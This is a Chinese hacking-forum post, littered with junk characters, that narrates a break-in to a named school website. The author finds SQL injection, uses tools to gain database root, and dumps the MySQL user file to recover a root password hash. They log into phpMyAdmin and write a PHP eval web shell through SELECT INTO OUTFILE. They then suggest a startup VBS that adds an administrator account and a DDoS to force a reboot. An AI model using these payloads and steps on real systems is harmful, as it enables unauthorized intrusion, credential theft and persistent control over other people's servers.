第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
. T/ F. U5 a% w/ ?$ p& [! Q% c发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
, K! U" Y3 @# J
& A: w2 v0 M, \, [+ l$ [6 \& T4 Y. s2 M2 g% A
3 y& d2 U" V$ W- H: d- Y
常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
6 O- ~* A1 ?) s9 C3 @7 {2 i5 Y5 _% M N4 T
& L. C) c, u# I$ ]+ _那么想可以直接写入shell ,getshell有几个条件:' w! }! \2 ~( J
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
" i. A M9 ^3 G% s( }1 [6 e& L! @/ G" Y# O
试着爆绝对路径: 9 ~1 W$ t" \( S. ^; {2 v
1./phpMyAdmin/index.php?lang[]=1
# U) P; t3 w! S3 y$ k2./phpMyAdmin/phpinfo.php
" }1 C/ D: z# B8 c0 y3./load_file()
$ \# c! D, U: B9 e9 E- m4./phpmyadmin/themes/darkblue_orange/layout.inc.php
: D& q, C) C: W$ a- C5./phpmyadmin/libraries/select_lang.lib.php
$ G1 @+ m) w, S- ^4 n5 T6./phpmyadmin/libraries/lect_lang.lib.php
6 N q+ H. ~; C7./phpmyadmin/libraries/mcrypt.lib.php
& }. V+ C* f7 r8 O8 I% h/ k9 h8./phpmyadmin/libraries/export/xls.php
2 C D* g5 J% @" L: T! l' Q& C8 O& I W. S/ ]2 c
均不行........................... 2 ^* B( {/ D9 A9 T
6 y+ Y: e. {# }御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php , \+ g" i7 a9 x/ }/ y/ B4 r
8 m2 v9 s5 F" i0 F
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 0 q5 g# P1 r2 } E- L& I5 Q' Y! K
, V9 E0 e/ ^5 d默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
5 g( k y x1 ^ \2 ]3 O3 d! |) P) B( T$ V( u& Z
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... # b* ]5 O2 m F$ \) C
8 N1 M, ]/ \' _/ X3 g7 F
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell " P9 F! W- N, @5 ]% p
7 ^/ ?2 f* t. D; e
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 0 J5 ^' Q$ W6 ]5 [# @
0 d; O9 `% k9 x9 B4 ^
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD & U- o$ G" o( k
) R- @' c. c' ]; }: w- W: `成功读到root密码: ' y1 u8 u" g( m E
- `# k# U4 x1 e5 J) ?0 t( h9 L
17---- r(0072)
3 L/ U3 B, u0 Z) i1 E! r18---- o(006f) 6 p4 j3 w7 X8 H
19---- o(006f)
/ _) G& g! i; f: V5 P0 O% x20---- t(0074) # @+ [4 B6 p% N9 i
21---- *(002a)
T# }" m: N2 o22---- 8(0038)
" R7 Z) }( E" Z3 x23---- 2(0032) % a4 l/ i; f- c8 {* O3 y5 G
24---- E(0045) % @, v+ r0 U9 Z- E
25---- 1(0031)
! J5 L8 ]) d; G0 n3 h* T26---- C(0043) & |: _* O8 `% R
27---- 5(0035) 1 {* Q# L) l! u5 d; H
28---- 8(0038)
+ f L) U* V4 [8 ^; r7 [29---- 2(0032) 5 J6 s& u/ |! K3 j5 ~8 s
30---- 8(0038) - L6 { G3 U% @# n
31---- A(0041)
' z3 c) {4 J9 j* f2 C7 G32---- 9(0039)
+ Z, ~/ M" W, T33---- B(0042)
# j0 @( x( o7 v3 p34---- 5(0035)
7 O# r7 O+ w! w. X35---- 4(0034)
4 ?6 q% _. \9 V% C: ~36---- 8(0038)
# I$ e' }1 N( K& d/ @' [37---- 6(0036) 0 l& s; n8 J9 r" _6 ?# P3 j. s! w/ `
38---- 4(0034)
9 D( E8 a+ o6 F0 E* o& |39---- 9(0039) 1 B# I2 R* n3 |* q
40---- 1(0031)
; T9 }; g& a" z4 {41---- 1(0031)
- J+ d5 Z {% z0 I7 @! w. Z. o42---- 5(0035) , C n) X4 J; F( T
43---- 3(0033)
6 O) ~) K9 j. t& M: L44---- 5(0035) % y$ t$ O" U. E) I# Z6 F
45---- 9(0039) 4 U: [$ ^ k! m ]5 v
46---- 8(0038)
# K; B+ f! \8 e& E9 }2 a# k! f! A6 _- j47---- F(0046)
: ]& ^& b8 ]# X# h* _48---- F(0046) $ P. L# ?1 Q. T% ~2 _5 F
49---- 4(0034) ! U* K0 v& [* u) C- E+ }3 K4 K& v
50---- F(0046) , U! P% i. |& P, C
51---- 0(0030)
. A* h* Z. O$ K3 U& G+ ]52---- 3(0033)
8 x- x' H5 s: F9 _ }2 O53---- 2(0032) ! ~- t1 ~# M W$ r- s$ J
54---- A(0041)
/ g" U Z$ ~; n, b# M( J* _55---- 4(0034)
& B. o Y- C( C" Z; G6 l56---- A(0041)
* D2 ]' z' t/ o) c: W- u$ T: H' v4 ~3 i57---- B(0042) ) P# p2 n2 f r: o4 J/ [7 J
58---- *(0044)
4 p, K* y8 D+ J O5 V; s) e* \59---- *(0035)
# J; z9 i$ q1 t, U% j$ M. m60---- *(0041)
/ U# d; C) N p# X g. n61---- *0032) i: E+ ^0 |! r# Q) K
' u4 k) U; z* f
解密后成功登陆phpmyamin 8 y: z4 L. L* J! m
+ r2 N8 O' Y* o2 b8 }
9 F8 q! f" I" m6 Y. }
/ [0 o! Z7 H' O& z3 U M; X
$ y0 c- U! ?& f: V3 C找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
, I3 P" Y, }- H7 Q' F! M; J: ~) s5 K' S, R
成功执行,拿下shell,菜刀连接: 9 \' L+ s( i( z% @1 T
# Z* y% u' X8 U+ K服务器不支持asp,aspx,php提权无果................... ; k1 i/ U9 }& G* {# Y; F' w. j; w
3 K3 A8 n6 H( y; j; F2 S6 `
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
9 I, T: _+ V1 Z% V8 H7 K服务器上已经有个隐藏帐号了
9 n/ g, w# m6 N: o" ?& m别名 administrators
' k8 C- U/ a9 Z) R6 p* }注释 管理员对计算机/域有不受限制的完全访问权 + f5 E) w- n8 e, f# I# T: O
成员 - H. r' |7 J- y9 U" q. F
-------------------------------------------------------------------------------
2 i: r( U9 J4 b1 Hadmin* C) k) ]2 g" n7 b8 t" K" E# Q" ~' n
Administrator
5 N4 P4 i) t. `* ^slipper$
' f" B( B5 Q, ~: n! O* s/ M! K" t' ]sqluser% f2 h+ i: k* [+ D# l% S, ~) u
命令成功完成。 2 G3 o4 h/ y3 F2 B3 F3 ?3 w0 ?8 m
( q2 F8 d5 V3 F4 P3 ~& u' k5 {5 o
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。: I, ]% t' U+ b/ I; R0 A$ R
, W% |7 _6 L, f: ~- Yddos服务器重启,不然就只能坐等服务器重启了...............................
2 k2 [5 G) V+ y' {, e2 J
2 ]2 u# i; s% T- L9 n- a: {) {
' g5 h* }& U" ? v. x | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
